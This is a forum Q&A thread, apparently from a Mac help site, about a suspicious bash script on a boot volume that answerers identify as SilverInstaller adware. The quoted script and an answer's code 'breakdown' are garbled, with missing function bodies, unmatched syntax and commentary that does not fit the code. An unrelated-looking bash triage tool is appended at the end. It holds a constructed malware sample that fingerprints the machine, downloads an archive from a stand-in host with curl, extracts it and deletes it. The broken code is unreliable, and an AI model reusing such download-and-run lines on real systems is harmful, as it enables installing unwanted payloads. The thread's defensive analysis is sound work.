What is this unknown executable on my boot volume? Is it Malicious?


20

I noticed I had this file in the Macintosh HD folder.

[image]

And then when I click on it, it shows this:

[image]

Apparently this file was created in 2017, but I don't remember creating it.

Any idea what it could be?

Its content:

#!/bin/bash
func_4() [ "$COUNTRY" == "CA" ]
func_4 &

macos bash file malware

edited Sep 11 at 18:10
ankii

asked Sep 10 at 20:52
Friendly Siren

  • 31

    Double clicking (aka running the file) is not advisable since you have no idea what it does. This appears to be a shell script of some type so you should edit it and post the contents to your original question so we can see what it contains.

    – Allan
    Sep 10 at 21:03

  • 3

    Open it in a text editor, that is what I do. Often these are spurious files created by an app or the OS that can be deleted with no consequence. But if you are curious, peek inside and see what it says...

    – Steve Chambers
    Sep 10 at 21:03

  • 2

    If you want to do this via the terminal, just issue the command cat file | pbcopy and then paste it to the question. Do this from the Macintosh HD folder.

    – Allan
    Sep 10 at 21:04

  • 2

    So, what I was able to uncover is that the script downloads and extracts a file from premiummac.com which is hosted on an AWS server. Issue the command dig premiummac.com in Terminal for the details. searchitdown seems to redirect to a Google page. What you’re looking at here is some very questionable script that looks, walks, and quacks like a malware-infected duck.

    – Allan
    Sep 10 at 21:39

  • 8

    That script downloads malware from a remote server. You need to assume it ran at some point and your system is already compromised. Don't take any chances and reinstall the machine, then change your passwords and consider all data that was in contact with the machine up to the reinstall compromised.

    – André Borie
    Sep 11 at 10:54

2 Answers

42

This is SilverInstaller, adware to download more adware and ‘potentially unwanted programs’. This was likely distributed through fake Flash popups, which someone on the system clicked on, downloaded, opened, installed and provided administrator credentials to.

Installed software in this package likely includes

MacKeeper, VSearch, a Pirrit injector, BrowserEnhancer, MPlayer

all of which you most certainly don't want.

  • https://www.intego.com/mac-security-blog/silverinstaller-uses-new-techniques-to-install-puapup/

  • https://www.intego.com/mac-security-blog/silverinstaller-sneakier-than-previously-thought/

I'll break down the code.

#!/bin/bash

This code is a script to be interpreted by bash, noted by this shebang.

func_4() awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }')

Get a unique identifier for this machine to be used later.

COUNTRY="CA"
if [ "$COUNTRY" == "AU" ]
func_4 &

Function all ready to go, time to call it.

edited Sep 10 at 22:19

answered Sep 10 at 21:48
grg

  • 4

    This answers these two questions too :) stackoverflow.com/search?q=www.searchitdown.com

    – ankii
    Sep 10 at 22:00

  • 3

    @grg thank you so much for taking the time to both identify this and break down the code for me to understand it. Any idea what I should do to get rid of it? I already ran Malwarebytes on my Mac.

    – Friendly Siren
    Sep 10 at 22:49

  • 1

    @FriendlySiren you should be able to run sudo rm /File to get rid of the script itself. This won't remove any malware installed by it though.

    – nohillside
    Sep 11 at 13:11

  • 4

    It's pretty likely the hardcoded values (COUNTRY and CLIENT_COMP) are filled in by the server as it's sending the script. It's easier and more reliable than having the server change that code dynamically.

    – Kevin
    Sep 11 at 17:06

  • 2

    The good news is that two out of three payloads return server errors, and the third is non-functional without the others.

    – Mark
    Sep 11 at 19:54

5

That script does everything I would expect malware to do and has been around for a while, so the domains it connects to could be blocked or shut down now.

  • Downloads some files, runs those files and cleans up after itself.

It could be ad(vertising)ware instead of malware, but it’s clearly fingerprinting your Mac, reporting a unique identifier for your Mac and intending to change the state of the Mac. Unless you opted in to the tool and wanted it to run (and even if you did once), downloading and running the Malwarebytes cleaner would be my next step.

  • https://www.malwarebytes.com/

answered Sep 10 at 21:35
bmike

  • 3

    The output including and following 'logout' is part of Terminal's session management (/etc/bashrc_Apple_Terminal) and unrelated to the file.

    – grg
    Sep 10 at 21:03

  • @bmike I've run Malwarebytes on my Mac many times, it never got rid of this file for some reason. But I'll run it again just to make sure. Thanks :)

    – Friendly Siren
    Sep 10 at 22:51
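
The behaviours both answers point to (a machine-ID lookup, a download, unpacking, self-cleanup and a backgrounded function call) can be checked by reading the file rather than running it. The following is an added example, not code from this thread or from SilverInstaller; the function names, the indicator patterns and the embedded sample with its example.invalid host are constructed for illustration.

```bash
#!/bin/bash
# Static triage of an unknown script: the file is only read, never executed.

# Indicator classes, one per behaviour named in the answers above.
CLASSES="fingerprint download unpack cleanup background"

# Extended regex for each class (illustrative patterns, not an exhaustive list).
pattern_for() {
    case $1 in
        fingerprint) echo 'IOPlatformUUID|ioreg[[:space:]]' ;;
        download)    echo '(^|[^[:alnum:]_])(curl|wget)[[:space:]]' ;;
        unpack)      echo '(^|[^[:alnum:]_])(tar|unzip|ditto)[[:space:]]' ;;
        cleanup)     echo '(^|[^[:alnum:]_])rm[[:space:]]+-[a-zA-Z]*[rf]' ;;
        background)  echo '[^&]&[[:space:]]*$' ;;
        *)           return 1 ;;
    esac
}

# Print the interpreter named on the shebang line, or nothing if there is none.
shebang_of() {
    head -n 1 "$1" | sed -n 's/^#![[:space:]]*//p'
}

# Print "class:lineno:text" for each matching line, skipping comment-only lines
# so that a word in a comment does not count as behaviour.
scan_indicators() {
    si_file=$1
    for si_class in $CLASSES; do
        si_pat=$(pattern_for "$si_class")
        grep -nE -- "$si_pat" "$si_file" \
            | grep -vE '^[0-9]+:[[:space:]]*#' \
            | sed "s/^/$si_class:/"
    done
}

# Number of distinct indicator classes present in the file (0 to 5).
score_script() {
    scan_indicators "$1" | cut -d: -f1 | sort -u | wc -l | tr -d ' '
}

# Distinct hostnames found in http(s) URLs, for DNS lookups or blocklists.
list_hosts() {
    grep -oE 'https?://[A-Za-z0-9.-]+' "$1" | sed -E 's#^https?://##' | sort -u
}

# Write a CONSTRUCTED sample (not the file from the question) to a temp file
# and print its path. mktemp creates it without the execute bit.
make_sample() {
    ms_file=$(mktemp "${TMPDIR:-/tmp}/triage.XXXXXX") || return 1
    cat > "$ms_file" <<'EOF'
#!/bin/bash
# constructed sample for the triage demo
func_4() {
  MID=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }')
  curl -s -o /tmp/pkg.tgz "http://downloads.example.invalid/pkg.tgz"
  tar -xzf /tmp/pkg.tgz -C /tmp
  rm -rf /tmp/pkg.tgz
}
func_4 &
EOF
    echo "$ms_file"
}

# Demo run over the constructed sample.
SAMPLE=$(make_sample)
echo "interpreter: $(shebang_of "$SAMPLE")"
echo "indicator classes present: $(score_script "$SAMPLE") of 5"
scan_indicators "$SAMPLE"
echo "hosts referenced:"
list_hosts "$SAMPLE"
rm -f "$SAMPLE"
```

To check a real file, pass its path to scan_indicators and list_hosts instead of the sample; a list of hits is a prompt for closer reading, not a verdict.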











